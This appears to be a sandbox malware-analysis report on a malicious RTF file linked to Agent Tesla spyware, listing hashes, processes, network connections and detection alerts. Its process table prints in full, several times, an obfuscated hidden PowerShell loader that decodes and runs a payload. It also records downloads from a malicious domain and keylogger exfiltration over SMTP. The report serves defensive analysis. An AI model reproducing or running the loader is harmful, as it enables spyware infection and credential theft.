File name: | f104741a844a97e19cb0911e5cf55fbc056dd5eb792265b4d805f5a24d1b7bc1 |
Full analysis: | https://app.any.run/tasks/86ce00aa-f7d8-4b77-ba39-e91017fef6c8 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | September 11, 2019, 07:51:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | E6A8477BB74C41BC0F0D3B6D9A2AB2CB |
SHA1: | B5FCE17ABA811392189F14994C285D1EE34E958B |
SHA256: | F104741A844A97E19CB0911E5CF55FBC056DD5EB792265B4D805F5A24D1B7BC1 |
SSDEEP: | 12288:PP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8t4:stZtZtZtZtZtZtZtZtZtZtZt4 |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3600 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f104741a844a97e19cb0911e5cf55fbc056dd5eb792265b4d805f5a24d1b7bc1.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2596 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2412 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '03150b580114251f114203594d13115f085356351b4512511b48304308401f0b07182f5a0203105916671314145f0551055d17450f5a1146314f1540130b4c720f5511080d45125d15155943155d180142651f4702030f182f7b4d13115f085356351b4512511b482c53120f7b6c124304581f0542550a550515425b57034500074d3d701a0a2b5b165b04124a140d510408075a5506544a275812460f360d5f08404b442553126404090177025004031145441d2b46124304581f0542451255020f0116034c02031058467d18123242141410045153521c3f08166612465600545550514e544e4512461f0805160e0d125355024f0f2d220e5a2f59060910424e161d03105803584554401a46711812104f365b1f0816165b14542a0d5702781f041057144d544f3f161641140a0b5546470207165f0514131e1653145a562f0c423640044607535e50104e1142145d180142415f5015024b0d3d701a0a2b5b165b04124a140d510408075a5506544a42730840041f32590f5a025b40600f460213035a36461912075512165f3b424613561a0f0116154017120b5546510e120744081414090d5a4659455f0003511c3f0816661246561351020402104a377f0840261210161e511455061a46411f08161608011350565205185609174246411f081616095617050400021d4d3d265a0a7d1b160d44121c542d074408511a55501802581a444e16235a02141b66095d18125f1434401a2b0d400379130b0d441f165a463153127817151673144619145f50075805034b6b46470207165f0514131e1653145a56100d5f02140653550e530d5e2f0c423640044604530405444a2b58126402144245550045544e5f08405614010e53065f5d124304581f0542451255020f01160f5a02461600070110544a1f1d7d1812324214141a5406525e07565b4253030c12004a4f520c455150054e164751525457054300560e530447075257441d5f5d0b504e584402060e55094b2f0c42364004483853145b5f1d0559125b5602030e5e561253594b2f5a02361644465a4e070300040910045153521c1a5406525e075a1f560e550344554a145503460453075352455357015703465e500652074656570457074752401f4f0f1f004a585e551750000b5b7d18123242141a2c0310594f4f110916594650175e5a5402014d1b377f0840261210160c504005560f5b1c232f0c423640044f570d135d181242575206455f5f065d5d104e435b550d1453551e080c170754544a5e125001025f18461e56064a5b031242575206455f4b1f1d5319120d1602554e5e0052530f0b241b42036f2b46010554071200560b1d040e55531a564c10004e061e0d461b597f0840261210160d00140254075b791714115e075858270e5a09573e210e5904551a4e511f5d791714115e075858250d461f1c155550050252424a521a0d00140254074a075f5d1203510c435f4a580343562f0c423640044e0c0e075540044c62097d181254024e1d5d561a065605144f4e5d52561250531a551d4d02030e5e5612535816315114250e5f035a0246075307004f535f5803435631075425581f030c424e1d4d1516440f5a11460057570d435b2758105d04090c5b035a024825531272190a0653146417120a1e235a000f1059085913081618354413050b570a72190a0653141a3716125a0f5717120b5908701712031f4d162a3a0c0350054f5404144d4d425e510154075e44570e560747075705441d4d030757520d43482659115a1a090352205d1a034a4f520c455150054e16470353045702425057555756435f520256504352520252504753525356564205560e5204475f530052504250530253564756520f5704430452015756470552505650430252055305435e520557554355401f4a5617575b034f0f26140d5503470535165714403f080459465c430703050209180315163646190507451567020710422f5a10094a5407054f534b0d364619050745151a25120344121c1e53035755505f5d10531241040842065d490613005a0f5756151657125d15461142145d1801424f520c455150054e4702140b58011400035100041d0d1516440f5a114604000502135e500b44421004545052164d1516440f5a114607535e50105b3142145d18014c730b44021f595009465e0f0c42465d4b56595f5a42135554544878130805420e0f1f4d5f044f4f141f16534652145507025b7719081453144058320d741f40134e1453550214483143044702140b58011c1f4a501f4a05404f5953030c1200490b4e571e07101f4e5214550702466a5600545550514e54391e0f1b444f42134652400554535e06582a075801401e3b4b0d1b4613121744081413035a52000f0b1b'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
876 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2252 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '03150b580114251f114203594d13115f085356351b4512511b48304308401f0b07182f5a0203105916671314145f0551055d17450f5a1146314f1540130b4c720f5511080d45125d15155943155d180142651f4702030f182f7b4d13115f085356351b4512511b482c53120f7b6c124304581f0542550a550515425b57034500074d3d701a0a2b5b165b04124a140d510408075a5506544a275812460f360d5f08404b442553126404090177025004031145441d2b46124304581f0542451255020f0116034c02031058467d18123242141410045153521c3f08166612465600545550514e544e4512461f0805160e0d125355024f0f2d220e5a2f59060910424e161d03105803584554401a46711812104f365b1f0816165b14542a0d5702781f041057144d544f3f161641140a0b5546470207165f0514131e1653145a562f0c423640044607535e50104e1142145d180142415f5015024b0d3d701a0a2b5b165b04124a140d510408075a5506544a42730840041f32590f5a025b40600f460213035a36461912075512165f3b424613561a0f0116154017120b5546510e120744081414090d5a4659455f0003511c3f0816661246561351020402104a377f0840261210161e511455061a46411f08161608011350565205185609174246411f081616095617050400021d4d3d265a0a7d1b160d44121c542d074408511a55501802581a444e16235a02141b66095d18125f1434401a2b0d400379130b0d441f165a463153127817151673144619145f50075805034b6b46470207165f0514131e1653145a56100d5f02140653550e530d5e2f0c423640044604530405444a2b58126402144245550045544e5f08405614010e53065f5d124304581f0542451255020f01160f5a02461600070110544a1f1d7d1812324214141a5406525e07565b4253030c12004a4f520c455150054e164751525457054300560e530447075257441d5f5d0b504e584402060e55094b2f0c42364004483853145b5f1d0559125b5602030e5e561253594b2f5a02361644465a4e070300040910045153521c1a5406525e075a1f560e550344554a145503460453075352455357015703465e500652074656570457074752401f4f0f1f004a585e551750000b5b7d18123242141a2c0310594f4f110916594650175e5a5402014d1b377f0840261210160c504005560f5b1c232f0c423640044f570d135d181242575206455f5f065d5d104e435b550d1453551e080c170754544a5e125001025f18461e56064a5b031242575206455f4b1f1d5319120d1602554e5e0052530f0b241b42036f2b46010554071200560b1d040e55531a564c10004e061e0d461b597f0840261210160d00140254075b791714115e075858270e5a09573e210e5904551a4e511f5d791714115e075858250d461f1c155550050252424a521a0d00140254074a075f5d1203510c435f4a580343562f0c423640044e0c0e075540044c62097d181254024e1d5d561a065605144f4e5d52561250531a551d4d02030e5e5612535816315114250e5f035a0246075307004f535f5803435631075425581f030c424e1d4d1516440f5a11460057570d435b2758105d04090c5b035a024825531272190a0653146417120a1e235a000f1059085913081618354413050b570a72190a0653141a3716125a0f5717120b5908701712031f4d162a3a0c0350054f5404144d4d425e510154075e44570e560747075705441d4d030757520d43482659115a1a090352205d1a034a4f520c455150054e16470353045702425057555756435f520256504352520252504753525356564205560e5204475f530052504250530253564756520f5704430452015756470552505650430252055305435e520557554355401f4a5617575b034f0f26140d5503470535165714403f080459465c430703050209180315163646190507451567020710422f5a10094a5407054f534b0d364619050745151a25120344121c1e53035755505f5d10531241040842065d490613005a0f5756151657125d15461142145d1801424f520c455150054e4702140b58011400035100041d0d1516440f5a114604000502135e500b44421004545052164d1516440f5a114607535e50105b3142145d18014c730b44021f595009465e0f0c42465d4b56595f5a42135554544878130805420e0f1f4d5f044f4f141f16534652145507025b7719081453144058320d741f40134e1453550214483143044702140b58011c1f4a501f4a05404f5953030c1200490b4e571e07101f4e5214550702466a5600545550514e54391e0f1b444f42134652400554535e06582a075801401e3b4b0d1b4613121744081413035a52000f0b1b'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2776 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3328 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2464 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF41.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF40.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2280 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '03150b580114251f114203594d13115f085356351b4512511b48304308401f0b07182f5a0203105916671314145f0551055d17450f5a1146314f1540130b4c720f5511080d45125d15155943155d180142651f4702030f182f7b4d13115f085356351b4512511b482c53120f7b6c124304581f0542550a550515425b57034500074d3d701a0a2b5b165b04124a140d510408075a5506544a275812460f360d5f08404b442553126404090177025004031145441d2b46124304581f0542451255020f0116034c02031058467d18123242141410045153521c3f08166612465600545550514e544e4512461f0805160e0d125355024f0f2d220e5a2f59060910424e161d03105803584554401a46711812104f365b1f0816165b14542a0d5702781f041057144d544f3f161641140a0b5546470207165f0514131e1653145a562f0c423640044607535e50104e1142145d180142415f5015024b0d3d701a0a2b5b165b04124a140d510408075a5506544a42730840041f32590f5a025b40600f460213035a36461912075512165f3b424613561a0f0116154017120b5546510e120744081414090d5a4659455f0003511c3f0816661246561351020402104a377f0840261210161e511455061a46411f08161608011350565205185609174246411f081616095617050400021d4d3d265a0a7d1b160d44121c542d074408511a55501802581a444e16235a02141b66095d18125f1434401a2b0d400379130b0d441f165a463153127817151673144619145f50075805034b6b46470207165f0514131e1653145a56100d5f02140653550e530d5e2f0c423640044604530405444a2b58126402144245550045544e5f08405614010e53065f5d124304581f0542451255020f01160f5a02461600070110544a1f1d7d1812324214141a5406525e07565b4253030c12004a4f520c455150054e164751525457054300560e530447075257441d5f5d0b504e584402060e55094b2f0c42364004483853145b5f1d0559125b5602030e5e561253594b2f5a02361644465a4e070300040910045153521c1a5406525e075a1f560e550344554a145503460453075352455357015703465e500652074656570457074752401f4f0f1f004a585e551750000b5b7d18123242141a2c0310594f4f110916594650175e5a5402014d1b377f0840261210160c504005560f5b1c232f0c423640044f570d135d181242575206455f5f065d5d104e435b550d1453551e080c170754544a5e125001025f18461e56064a5b031242575206455f4b1f1d5319120d1602554e5e0052530f0b241b42036f2b46010554071200560b1d040e55531a564c10004e061e0d461b597f0840261210160d00140254075b791714115e075858270e5a09573e210e5904551a4e511f5d791714115e075858250d461f1c155550050252424a521a0d00140254074a075f5d1203510c435f4a580343562f0c423640044e0c0e075540044c62097d181254024e1d5d561a065605144f4e5d52561250531a551d4d02030e5e5612535816315114250e5f035a0246075307004f535f5803435631075425581f030c424e1d4d1516440f5a11460057570d435b2758105d04090c5b035a024825531272190a0653146417120a1e235a000f1059085913081618354413050b570a72190a0653141a3716125a0f5717120b5908701712031f4d162a3a0c0350054f5404144d4d425e510154075e44570e560747075705441d4d030757520d43482659115a1a090352205d1a034a4f520c455150054e16470353045702425057555756435f520256504352520252504753525356564205560e5204475f530052504250530253564756520f5704430452015756470552505650430252055305435e520557554355401f4a5617575b034f0f26140d5503470535165714403f080459465c430703050209180315163646190507451567020710422f5a10094a5407054f534b0d364619050745151a25120344121c1e53035755505f5d10531241040842065d490613005a0f5756151657125d15461142145d1801424f520c455150054e4702140b58011400035100041d0d1516440f5a114604000502135e500b44421004545052164d1516440f5a114607535e50105b3142145d18014c730b44021f595009465e0f0c42465d4b56595f5a42135554544878130805420e0f1f4d5f044f4f141f16534652145507025b7719081453144058320d741f40134e1453550214483143044702140b58011c1f4a501f4a05404f5953030c1200490b4e571e07101f4e5214550702466a5600545550514e54391e0f1b444f42134652400554535e06582a075801401e3b4b0d1b4613121744081413035a52000f0b1b'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2884 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\1c-lkavx.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3600 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9F04.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2596 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA608.tmp.cvr | — | |
MD5:— | SHA256:— | |||
876 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRABD5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OQFXVHJZ0DXFVHYFW525.temp | — | |
MD5:— | SHA256:— | |||
3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAE55.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCAF40.tmp | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.pdb | — | |
MD5:— | SHA256:— | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XKMNKAHBTXFBIU3EGQ7P.temp | — | |
MD5:— | SHA256:— | |||
2464 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF41.tmp | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4052 | iexplore.exe | GET | 302 | 2.19.38.59:80 | http://go.microsoft.com/fwlink/?LinkId=57426&Ext=DS_Store | unknown | — | — | whitelisted |
4052 | iexplore.exe | GET | 301 | 2.16.186.27:80 | http://shell.windows.com/fileassoc/fileassoc.asp?Ext=DS_Store | unknown | — | — | whitelisted |
3452 | n56192f.exe | GET | 200 | 18.214.132.216:80 | http://checkip.amazonaws.com/ | US | text | 15 b | shared |
2412 | powershell.exe | GET | 200 | 162.144.128.116:80 | http://bobbychiz.top/proforma/jiokee.exe | US | executable | 673 Kb | malicious |
3624 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4052 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
4052 | iexplore.exe | 2.16.186.27:80 | shell.windows.com | Akamai International B.V. | — | whitelisted |
2412 | powershell.exe | 162.144.128.116:80 | bobbychiz.top | Unified Layer | US | malicious |
3624 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3624 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
4052 | iexplore.exe | 2.19.38.59:80 | go.microsoft.com | Akamai International B.V. | — | whitelisted |
3452 | n56192f.exe | 18.214.132.216:80 | checkip.amazonaws.com | — | US | shared |
3452 | n56192f.exe | 159.253.148.204:587 | mail.sigmatransport.ma | SoftLayer Technologies Inc. | NL | malicious |
4052 | iexplore.exe | 40.90.137.127:443 | login.live.com | Microsoft Corporation | US | unknown |
Domain | IP | Reputation |
---|---|---|
bobbychiz.top |
| malicious |
www.bing.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
shell.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
checkip.amazonaws.com |
| shared |
mail.sigmatransport.ma |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2412 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2412 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2412 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2412 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2412 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
3452 | n56192f.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
3452 | n56192f.exe | A Network Trojan was detected | AV TROJAN Win.Keylogger.AgentTesla variant outbound SMTP connection |
3452 | n56192f.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Spy.Keylogger.AgentTesla Exfiltration by SMTP |
Process | Message |
---|---|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|